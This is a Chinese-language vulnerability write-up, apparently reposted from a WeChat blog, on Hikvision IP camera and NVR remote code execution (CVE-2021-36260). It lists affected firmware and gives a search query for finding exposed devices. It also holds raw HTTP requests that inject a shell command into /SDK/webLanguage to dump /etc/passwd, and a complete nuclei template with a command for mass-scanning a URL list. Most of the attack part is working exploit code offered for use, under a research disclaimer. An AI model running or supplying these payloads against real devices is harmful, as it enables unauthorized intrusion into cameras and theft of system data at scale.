一、漏洞简介
海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞(CVE-2021-36260)。漏洞影响IP摄像头和NVR设备固件,漏洞是因为对输入参数检验不充分,未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。
二、影响版本
网络摄像头
| 产品类型 | 影响版本 |
| IPC_E0 | IPC_E0_CN_STD_5.4.6_180112 |
| IPC_E1 | 未知 |
| IPC_E2 | IPC_E2_EN_STD_5.5.52_180620 |
| IPC_E4 | 未知 |
| IPC_E6 | IPCK_E6_EN_STD_5.5.100_200226 |
| IPC_E7 | IPCK_E7_EN_STD_5.5.120_200604 |
| IPC_G3 | IPC_G3_EN_STD_5.5.160_210416 |
| IPC_G5 | IPC_G5_EN_STD_5.5.113_210317 |
| IPC_H1 | IPC_H1_EN_STD_5.4.61_181204 |
| IPC_H5 | IPCP_H5_EN_STD_5.5.85_201120 |
| IPC_H8 | Factory installed firmware mid 2021 |
| IPC_R2 | IPC_R2_EN_STD_V5.4.81_180203 |
PTZ 摄像机
| 产品类型 | 影响版本 |
| IPD_E7 | IPDEX_E7_EN_STD_5.6.30_210526 |
| IPD_G3 | IPDES_G3_EN_STD_5.5.42_210106 |
| IPD_H5 | IPD_H5_EN_STD_5.5.41_200911 |
| IPD_H7 | IPD_H7_EN_STD_5.5.40_200721 |
| IPD_H8 | IPD_H8_EN_STD_5.7.1_210619 |
旧摄像头固件
| 产品类型 | 影响版本 |
| IPC_R7 | 5.4.x |
| IPD_R7 | |
| IPC_G0 | |
| IPC_H3 | |
| IPD_H3 |
三、资产测绘
app="HIKVISION-视频监控"四、漏洞复现
1.执行命令,写入到文件中(这里读取/etc/passwd)
PUT /SDK/webLanguage HTTP/1.1User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: 172.16.114.40X-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Language: en-US,en;q=0.9,sv;q=0.8Content-Length: 91<language>$(cat /etc/passwd>webLib/passwd)</language>
2.读取命令执行结果
GET /passwd HTTP/1.1User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost: 172.16.114.40X-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Language: en-US,en;q=0.9,sv;q=0.8Content-Length: 91<language>$(cat /etc/passwd>webLib/passwd)</language>
nuclei批量脚本放在文章最后
nuclei.exe -t "C:UsersAdministratorDesktopCVE-2021-36260.yaml" -l url.txtnuclei脚本:
https://github.com/ghosinshell/Nuclei-POC/blob/main/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86/CVE-2021-36260.yaml
id: CVE-2021-36260
info:
name: 海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
author: ghosinshell
severity: critical
description: 漏洞是因为对输入参数检验不充分,未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。
tags: 海康威视,hikvision, 代码执行漏洞
reference:
- https://github.com/ghosinshell/Nuclei-POC
http:
- raw:
- |
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
ccept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 91
?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/passwd)</language>
- |
GET /passwd HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 91
?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/passwd)</language>
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, 'admin')"
condition: and
extractors:
- type: regex
part: body
regex:
- "(.*)"
原文始发于微信公众号(菜鸟学渗透):海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论